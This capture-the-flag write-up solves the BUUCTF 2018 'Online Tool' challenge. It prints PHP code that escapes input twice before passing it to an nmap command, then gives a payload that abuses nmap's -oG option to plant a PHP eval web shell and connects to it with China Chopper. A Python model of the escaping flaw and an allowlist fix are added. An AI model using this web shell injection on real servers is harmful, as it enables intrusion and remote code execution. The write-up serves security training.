[BUUCTF 2018]Online Tool 1
Challenge
[BUUCTF 2018]Online Tool 1, from BUUCTF
I. Solution steps
1. Audit the code
The code is as follows:
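<?php
// REMOTE_ADDR is overwritten with the client-supplied X-Forwarded-For header.
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    // Two escaping passes over the same value: the combination the solution relies on.
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    // Per-client working directory, named after the md5 of a fixed string plus REMOTE_ADDR.
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    // $host is appended to the nmap command line that system() hands to the shell.
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}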
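From the last line, we can see that nmap can be used to write $host to a file:
-oG xxx.php
This is the nmap option that writes output to a file.
By exploiting the double escaping of escapeshellarg() + escapeshellcmd(), closing the single quote lets us pass arbitrary arguments to the command.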
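Why the second call undoes the first, as an added example that is not part of the original write-up: a Python model of the Unix behaviour of PHP's escapeshellarg() and escapeshellcmd(), with shlex standing in for the shell's word splitting, plus an allowlist check of the kind that should run before any escaping. The function names, the harmless SAMPLE string and the TARGET pattern are assumptions made for the illustration.

```python
import re
import shlex

# Characters escapeshellcmd() backslash-escapes on Unix (quotes are handled separately).
META = set("#&;`|*?~<>^()[]{}$\\\n\xff")
# Assumed allowlist: hostname or dotted IPv4, alphanumeric at both ends (so no leading '-').
TARGET = re.compile(r"[A-Za-z0-9]([A-Za-z0-9.-]{0,251}[A-Za-z0-9])?")
# Constructed sample: same quote layout as the write-up's payload, harmless text instead.
SAMPLE = "' MARKER -oG out.txt '"

def escapeshellarg(s):
    """Model of escapeshellarg(): wrap in single quotes, rewrite each ' as '\\''."""
    return "'" + s.replace("'", "'\\''") + "'"

def escapeshellcmd(s):
    """Model of escapeshellcmd(): escape metacharacters, and escape a quote
    only when it has no matching partner later in the string."""
    out, open_quote = [], None
    for i, ch in enumerate(s):
        if ch in "'\"":
            if open_quote is None and ch in s[i + 1:]:
                open_quote = ch        # opening quote of a pair: left alone
            elif open_quote == ch:
                open_quote = None      # closing quote of the pair: left alone
            else:
                out.append("\\")       # unpaired quote: escaped
        elif ch in META:
            out.append("\\")           # this also doubles the backslashes in '\''
        out.append(ch)
    return "".join(out)

def argv_seen_by_shell(host, double_escape):
    """Arguments a POSIX shell would hand to nmap for this host value."""
    arg = escapeshellarg(host)
    if double_escape:
        arg = escapeshellcmd(arg)      # the challenge's second call
    return shlex.split("nmap -F " + arg)[2:]

def is_scan_target(host):
    """Validate the raw value first; only then quote it once with escapeshellarg()."""
    return TARGET.fullmatch(host) is not None

if __name__ == "__main__":
    print(argv_seen_by_shell(SAMPLE, False))   # one argument: the input itself
    print(argv_seen_by_shell(SAMPLE, True))    # several arguments, -oG among them
    print(is_scan_target(SAMPLE), is_scan_target("scanme.example"))
```

With escapeshellarg() alone the whole input stays one argument; after escapeshellcmd() doubles the backslash in each `'\''`, the quotes pair up differently and the shell splits the value into separate words.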
2. Build the payload
?host='<?php eval($_POST[1]);?> -oG shell.php '
This returns the upload path:
bf95f64e6948d09b42c923ac52b1d6df
3. Connect with China Chopper
1. Add the connection details
http://8a37515d-5eb0-4159-ad15-cc12901145e0.node4.buuoj.cn:81/bf95f64e6948d09b42c923ac52b1d6df/shell.php
2. Get the flag
flag{aa1827cb-30c0-4ddb-8df2-dca7633624c8}